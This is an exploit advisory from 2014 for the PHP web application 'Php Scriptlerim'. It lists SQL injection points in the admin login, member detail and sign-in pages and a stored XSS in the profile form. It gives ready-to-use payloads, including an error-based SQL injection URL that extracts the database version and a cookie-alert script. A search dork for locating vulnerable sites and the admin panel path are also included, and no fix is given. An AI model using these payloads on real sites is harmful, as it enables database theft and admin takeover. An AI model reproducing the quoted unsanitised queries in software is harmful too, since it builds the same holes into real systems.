facebook facebook twitter rss

Php Scriptlerim - Multi Vulnerability

Author: jsass , Published: 15-11-2014

# Exploit Title:  Php Scriptlerim - Multi Vulnerability

# Date         :  14-11-2014
# Author       :  jsass
# Software Link:​  http://www.phpscriptlerim.com/
# Tested on    :  kali linux
# Twitter      :  @KwSecurity
# Group        :  Q8 GRAY HAT TEAM
# Dork         :  "Powered By : Php Scriptlerim"     &  "İletişim : info@phpscriptlerim.com"
#########################################################################################################

[!] SQL Injection -- >  yonetim/index.php
code :

$query = mysql_query("SELECT * FROM administrator WHERE username='$username'");


exploit :

http://localhost/phpscriptlerim/yonetim/index.php

post 

username=admin(Inject Here)&password=admin&gonder=Giri%C5%9F+Yap

==============================================================

[!] SQL Injection -- > uyedetay.php

Code :


mysql_query("select * from uyeler where sefurl='$url'"); 
$url = $_GET['url'];


exploit :

http://localhost/phpscriptlerim/uyedetay.php?url=jsass(Inject Here)

http://localhost/phpscriptlerim/uyedetay.php?url=jsass%27%20AND%20%28SELECT%203581%20FROM%28SELECT%20COUNT%28*%29,CONCAT%28version%28%29,FLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27Hvkg%27=%27Hvkg

==============================================================

[!] xss -- >  uyebilgileri.php

code : 

if(isset($_POST['gonder'])){
    
    $text = $_POST['text'];
    $text1 = $_POST['text1']; 
    $password = $_POST['password'];
    $parola = md5($password);
    
 if($text==""||$text1==""){ echo '<font color="red"><b>Alanları boş geçemezsiniz.</b></font><br><br>'; }
 <li class="clearfix"> 
                        <label>İkinci İsim</label> 
                        <input type='text' name='text' value="<?php echo $bbb['text']; ?>" id='name' maxlength="55" />
                        <div class="clear"></div>

exploit :

http://localhost/phpscriptlerim/uyebilgileri.php
post
text=1"><script>alert(document.cookie)</script>&password=&text1=1"><h3>hh</h3>&gonder=Kaydet

===================================
[!] SQL Injection -- > signin.php

code :

if(isset($_POST['gonder'])){

$email = $_POST['email'];
$sifre = $_POST['sifre'];
$tarih = date('Y-m-d');
$parola = md5($sifre);

if($email==""||$sifre==""){ echo '<font color="red"><b>Bütün alanları doldurmanız gerekmektedir.</b></font><br><br>'; }else{

$xlb = mysql_query("SELECT * FROM uyeler WHERE email='$email'")

exploit : 
http://localhost/phpscriptlerim/signin.php
post
email=kuwaitybad%40hotmail.com(Inject Here)&sifre=1111&security=a4f29&gonder=Giri%C5%9F

[!]  admin panel 

http://localhost/phpscriptlerim/yonetim/index.php
#########################################################################################################

Greats : alm3refh.com & sec4ever.com & exploit4arab.com

Like us on Facebook :